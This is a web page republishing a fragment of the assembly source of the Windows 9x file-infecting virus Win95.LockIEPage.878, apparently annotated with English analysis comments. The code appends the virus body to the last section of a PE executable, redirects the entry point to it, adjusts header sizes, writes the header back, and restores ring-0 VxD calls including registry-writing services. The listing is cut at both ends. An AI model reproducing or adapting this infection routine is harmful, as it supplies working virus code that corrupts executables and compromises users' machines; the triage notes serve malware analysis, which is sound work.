| Win9x病毒--Win95.LockIEPage.878源代码 |
|
| 作者:未知 文章来源:网络收集 点击数: 更新时间:2006-3-29 15:22:23
|
; ---------------------------------------------------------------------------
; Win95.LockIEPage.878, published listing, one page of several (analysis notes).
;
; The excerpt is cut at both ends: it opens inside the routine that appends
; the virus body to a PE file and ends partway through @@VxdCallTable.
; @@Start, @@SetVxdCallOk, @@RegOpenKey, @@RegSetValueEx, @@RegCloseKey,
; @@AllocPage, @@HookFileApi, @@UniToBCSPath, VirusSize, FilePathBuffer,
; ReadFileBuffer and the fh*/ot* field names are defined outside this excerpt.
;
; Changes the visible code makes to a file (useful when triaging a sample):
;   - entry-point RVA is set to (last section RVA + its previous raw size)
;   - raw size of the last section grows by the value left in ecx
;   - virtual size of the last section and the image size grow only when the
;     new raw size exceeds the old virtual size
;   - the code itself contains "int 20h" followed by a dword service number,
;     a VxD dynamic-link form that ordinary Win32 applications do not carry
; ---------------------------------------------------------------------------
ecx                                     ; tail of an instruction that starts on the previous page
        cmp eax,size ReadFileBuffer-200h
        ja short @@CloseFile            ; presumably a bounds check on the section-table offset in eax -- confirm
        lea edi,[esi.fhObjectTable00+eax] ; edi = address of the last section-table entry
        mov edx,[edi.otPhysOffset]
        add edx,[edi.otPhysSize]        ; edx = raw offset + raw size of that section
        mov ecx,VirusSize               ; ecx = byte count for the write
        push esi                        ; keep the header pointer; esi is reused as the buffer pointer
@@GetVirusBase:
        mov esi,ebp
        sub esi,OFF FilePathBuffer-OFF @@Start ; esi = ebp - (FilePathBuffer - @@Start); assumes ebp addresses FilePathBuffer
        mov eax,0d601h                  ; file-I/O function code for "write file" (per the original comment)
        call @@FileIo                   ; IFSCall_FileIo write: virus body goes at the end of the last section
        pop esi                         ; esi = header pointer again
        jc short @@CloseFile            ; carry set is treated as failure: header is left unmodified
@@SetNewEntryRVA:
        mov eax,[edi.otPhysSize]        ; raw size before it is enlarged below
        add eax,[edi.otRVA]
        mov [esi.fhEntryRVA],eax        ; change the file's entry-point RVA (relative virtual address)
@@FixOtherHeaderVar:                    ; adjust the related file-header fields
        add [edi.otPhysSize],ecx        ; assumes ecx still holds the size just written -- not verifiable from here
        mov eax,[edi.otPhysSize]
        sub eax,[edi.otVirtSize]        ; eax = new raw size - virtual size
        jb short @@VirtSizeIsBigger     ; borrow: virtual size already covers the new raw size
@@PhysSizeIsBigger:
        add [edi.otVirtSize],eax        ; grow the virtual size by the difference
        add [esi.fhImageSize],eax       ; and the image size by the same amount
@@VirtSizeIsBigger:
        nop
@@GetReadFileBuffer0:
        mov esi,ebp
        add esi,size FilePathBuffer     ; esi = ebp + size FilePathBuffer; presumably the start of ReadFileBuffer
@@WriteBackFileHeader:
        mov ecx,size ReadFileBuffer     ; byte count = whole header buffer
        xor edx,edx                     ; file position 0
        mov eax,0d601h
        call @@FileIo                   ; IFSCall_FileIo write: header is written back to the file
@@CloseFile:
        mov eax,0d700h                  ; file-I/O function code for "close file" (per the original comment)
        call @@FileIo                   ; IFSCall_FileIo close file
@@OpenFileFalse:
        ret

; Wrapper around the ring-0 file I/O service. The dword after "int 20h" is
; data consumed by the VxD dynamic-link mechanism, not an instruction;
; high word 0040h / low word 0032h select the device and service.
@@FileIo:
        int 20h                         ; this is the IFSCall_FileIO subroutine
        dd 00400032h
        ret

; Rewrites each VxD call site back to its "int 20h" + service-dword form.
; ebx is the caller's return address (read with pop/push so the stack is
; unchanged); every target is addressed relative to @@SetVxdCallOk, so ebx is
; presumably the address of that label -- confirm against the caller.
; NOTE(review): Windows 9x is known to patch an executed int 20h dynamic link
; in place; this routine presumably undoes that patching -- confirm.
@@SetVxdCall:                           ; the following restores the VXDCALL (int 20h) instructions
        pop ebx
        push ebx
        mov ax,020cdh                   ; bytes CD 20 in memory order = "int 20h"
        lea esi,[ebx+OFF @@VxdCallTable-@@SetVxdCallOk] ; esi = table of service dwords
        cld                             ; stosw/movsd must walk forward
        lea edi,[ebx+OFF @@RegOpenKey-OFF @@SetVxdCallOk]
        stosw                           ; write "int 20h" at the call site
        movsd                           ; followed by the next dword from the table
        lea edi,[ebx+OFF @@RegSetValueEx-OFF @@SetVxdCallOk]
        stosw
        movsd
        lea edi,[ebx+OFF @@RegCloseKey-OFF @@SetVxdCallOk]
        stosw
        movsd
        lea edi,[ebx+OFF @@AllocPage-OFF @@SetVxdCallOk]
        stosw
        movsd
        lea edi,[ebx+OFF @@HookFileApi-OFF @@SetVxdCallOk]
        stosw
        movsd
        lea edi,[ebx+OFF @@UniToBCSPath-OFF @@SetVxdCallOk]
        stosw
        movsd
        lea edi,[ebx+OFF @@FileIo-OFF @@SetVxdCallOk]
        stosw
        movsd
        ret

; Service dwords, consumed by @@SetVxdCall in the order of its seven call
; sites. Only the first three entries are visible here; the table continues
; on the next page of the listing.
@@VxdCallTable:                         ; VxD call list
        dd 00010148h                    ; VMMCall_RegOpenKey
        dd 00010152h                    ; VMMCall_RegSetValueEx
        dd 00010149h                    ; VMMCall_RegCloseKey (comment truncated in the source page)